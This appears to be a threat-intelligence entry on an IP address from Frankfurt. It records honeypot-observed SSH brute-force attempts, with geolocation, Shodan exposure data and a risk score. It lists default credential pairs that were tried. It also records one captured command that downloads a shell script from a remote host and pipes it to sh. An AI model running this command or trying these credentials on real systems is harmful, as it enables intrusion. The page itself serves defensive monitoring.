TROYANOSYVIRUS
Active ThreatLOW

144.31.220.38

Country of Origin🇩🇪 Germany
First Detection4/15/2026
Last Activity4/15/2026
ISPEdgeSec Technologies Limited
🎯
185
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
0
Malware

Geolocation

Country
🇩🇪 Germany
City
Frankfurt am Main
ASN
AS216039
ISP
EdgeSec Technologies Limited

Attack Types

ssh_telnet_honeypot

Attacked Ports

22

Associated Malware

No associated malware

Attempted Credentials

🔐root/p@ssw0rd
1x
🔐root/root
1x
🔐root/1q2w3e
1x
🔐root/0
1x
🔐root/123456
1x
🔐root/1234567
1x
🔐www/www
1x
🔐dev/dev
1x
🔐ts3/ts3
1x
🔐root/123
1x
🔐demo/demo
1x
🔐weblogic/weblogic
1x
🔐ftpadmin/ftpadmin
1x
🔐odoo/odoo
1x
🔐postgres/postgres
1x

Executed Commands

$cd /tmp; wget http://2.26.98.67/bin.sh -O- | sh2x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
9999
Hostnames
hosted.by.myarena.me
CPEs
cpe:/o:canonical:ubuntu_linuxcpe:/a:openbsd:openssh:8.9p1

Risk Assessment

35
/100
LowMediumHighCritical